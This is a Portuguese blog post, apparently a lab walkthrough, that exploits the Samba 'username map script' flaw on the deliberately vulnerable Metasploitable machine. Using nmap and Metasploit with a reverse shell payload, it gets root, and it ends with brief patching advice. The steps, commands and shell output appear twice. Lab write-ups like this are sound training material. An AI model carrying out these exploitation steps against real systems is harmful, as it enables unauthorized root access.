Oi de novo!
Vamos a mais um post da nossa série “Exploitando o Metasploitable”. Neste post vamos explorar uma vulnerabilidade no Samba e com ela conseguir acesso Root ao sistema.
Antes de mais nada vamos achar onde na rede que está a vítima. Para isso vamos usar o nmap:
attacker@blackoutlabs:~# nmap -sV 192.168.0.1/24
Um dos resultados deve ser como o seguinte:
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-11 19:18 BRT
Nmap scan report for 192.168.0.100
Host is up (0.0014s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.87 seconds
Podemos notar (onde está em vermelho) o Samba rodando na porta 139 e na 445. Sim, as mesmas portas do famoso ms08_067_netapi, que explora uma vulnerabilidade no mesmo serviço, mas apenas no windows xp (ouvi boatos de pessoas que tiveram sucesso no win Vista/7).
Com o IP na mão vamos vamos iniciar o metasploit e procurar por nosso exploit.
attacker@blackoutlabs:~# msfconsole
+——————————————————-+
| METASPLOIT by Rapid7 |
+—————————+—————————+
| __________________ | |
| ==c(______(o(______(_() | |”"”"”"”"”"”"|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+—————————+—————————+
| o O o | \’\/\/\/’/ |
| o O | )======( |
| o | .’ LOOT ‘. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |”"\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)”"”**|(@)(@)**|(@) | ” || ” |
| = = = = = = = = = = = = | ‘————–’ |
+—————————+—————————+
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ — –=[ 938 exploits - 501 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
msf > search samba
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
exploit/freebsd/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (*BSD x86)
exploit/linux/samba/chain_reply 2010-06-16 00:00:00 UTC good Samba chain_reply Memory Corruption (Linux x86)
exploit/linux/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC good Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Linux x86)
exploit/multi/samba/nttrans 2003-04-07 00:00:00 UTC average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
exploit/multi/samba/usermap_script 2007-05-14 00:00:00 UTC excellent Samba "username map script" Command Execution
exploit/osx/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC average Samba lsa_io_trans_names Heap Overflow
exploit/osx/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Mac OS X PPC)
exploit/solaris/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC average Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Solaris SPARC)
exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 00:00:00 UTC excellent Citrix Access Gateway Command Execution
exploit/windows/http/sambar6_search_results 2003-06-21 00:00:00 UTC normal Sambar 6 Search Results Buffer Overflow
exploit/windows/license/calicclnt_getconfig 2005-03-02 00:00:00 UTC average Computer Associates License Client GETCONFIG Overflow
post/linux/gather/enum_configs normal Linux Gather Configurations
Novamente, vamos usar o que está destacado em vermelho e vamos ver suas opções:
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
Pode-se perceber que o exploit é extremamente simples, precisamos apenas informar o IP e a porta da vítima e do atacante(payload, mais adiante). Vamos preencher essas informações e rodar o exploit para ver o que acontece...
msf exploit(usermap_script) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(usermap_script) > set RPORT 445
RPORT => 445
msf exploit(usermap_script) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.0.100 yes The target address
RPORT 445 yes The target port
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set LHOST 192.168.0.106
LHOST => 192.168.0.106
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo Y9MlnoVTPC9oq8TG;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “Y9MlnoVTPC9oq8TG\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.0.106:4444 -> 192.168.0.100:51565) at 2012-09-11 19:20:41 -0300
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:45:2c:e8
inet addr:192.168.0.100 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe45:2ce8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3127 errors:0 dropped:0 overruns:0 frame:0
TX packets:2306 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:216601 (211.5 KB) TX bytes:154677 (151.0 KB)
Interrupt:16 Base address:0xd020
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:94 errors:0 dropped:0 overruns:0 frame:0
TX packets:94 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:47217 (46.1 KB) TX bytes:47217 (46.1 KB)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
id
uid=0(root) gid=0(root)
whoami
root
OWNED!!!
sh: OWNED!!!: not found
E ai está. Rodei alguns comandos para confirmar que estava na máquina e para ter certeza que estava como root.
Vamos a mais um post da nossa série “Exploitando o Metasploitable”. Neste post vamos explorar uma vulnerabilidade no Samba e com ela conseguir acesso Root ao sistema.
O que vamos precisar?
- Vítima rodando uma versão vulnerável do Samba
- Distro de Pentest com o Framework Metasploit
- Nmap ou outro portscanner
Localizando o alvo
Antes de mais nada vamos achar onde na rede que está a vítima. Para isso vamos usar o nmap:
attacker@blackoutlabs:~# nmap -sV 192.168.0.1/24
Um dos resultados deve ser como o seguinte:
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-11 19:18 BRT
Nmap scan report for 192.168.0.100
Host is up (0.0014s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.87 seconds
Podemos notar (onde está em vermelho) o Samba rodando na porta 139 e na 445. Sim, as mesmas portas do famoso ms08_067_netapi, que explora uma vulnerabilidade no mesmo serviço, mas apenas no windows xp (ouvi boatos de pessoas que tiveram sucesso no win Vista/7).
Explorando
Com o IP na mão vamos vamos iniciar o metasploit e procurar por nosso exploit.
attacker@blackoutlabs:~# msfconsole
+——————————————————-+
| METASPLOIT by Rapid7 |
+—————————+—————————+
| __________________ | |
| ==c(______(o(______(_() | |”"”"”"”"”"”"|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+—————————+—————————+
| o O o | \’\/\/\/’/ |
| o O | )======( |
| o | .’ LOOT ‘. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |”"\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)”"”**|(@)(@)**|(@) | ” || ” |
| = = = = = = = = = = = = | ‘————–’ |
+—————————+—————————+
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ — –=[ 938 exploits - 501 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
msf > search samba
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
exploit/freebsd/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (*BSD x86)
exploit/linux/samba/chain_reply 2010-06-16 00:00:00 UTC good Samba chain_reply Memory Corruption (Linux x86)
exploit/linux/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC good Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Linux x86)
exploit/multi/samba/nttrans 2003-04-07 00:00:00 UTC average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
exploit/multi/samba/usermap_script 2007-05-14 00:00:00 UTC excellent Samba "username map script" Command Execution
exploit/osx/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC average Samba lsa_io_trans_names Heap Overflow
exploit/osx/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Mac OS X PPC)
exploit/solaris/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC average Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Solaris SPARC)
exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 00:00:00 UTC excellent Citrix Access Gateway Command Execution
exploit/windows/http/sambar6_search_results 2003-06-21 00:00:00 UTC normal Sambar 6 Search Results Buffer Overflow
exploit/windows/license/calicclnt_getconfig 2005-03-02 00:00:00 UTC average Computer Associates License Client GETCONFIG Overflow
post/linux/gather/enum_configs normal Linux Gather Configurations
Novamente, vamos usar o que está destacado em vermelho e vamos ver suas opções:
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
Pode-se perceber que o exploit é extremamente simples, precisamos apenas informar o IP e a porta da vítima e do atacante(payload, mais adiante). Vamos preencher essas informações e rodar o exploit para ver o que acontece...
msf exploit(usermap_script) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(usermap_script) > set RPORT 445
RPORT => 445
msf exploit(usermap_script) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.0.100 yes The target address
RPORT 445 yes The target port
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set LHOST 192.168.0.106
LHOST => 192.168.0.106
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo Y9MlnoVTPC9oq8TG;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “Y9MlnoVTPC9oq8TG\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.0.106:4444 -> 192.168.0.100:51565) at 2012-09-11 19:20:41 -0300
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:45:2c:e8
inet addr:192.168.0.100 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe45:2ce8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3127 errors:0 dropped:0 overruns:0 frame:0
TX packets:2306 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:216601 (211.5 KB) TX bytes:154677 (151.0 KB)
Interrupt:16 Base address:0xd020
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:94 errors:0 dropped:0 overruns:0 frame:0
TX packets:94 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:47217 (46.1 KB) TX bytes:47217 (46.1 KB)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
id
uid=0(root) gid=0(root)
whoami
root
OWNED!!!
sh: OWNED!!!: not found
E ai está. Rodei alguns comandos para confirmar que estava na máquina e para ter certeza que estava como root.
Evitando o Ataque
- Mantenha sempre o Samba atualizado
- Fique atento aos patchs de segurança do Site do Desenvolvedor
0 comentários:
Postar um comentário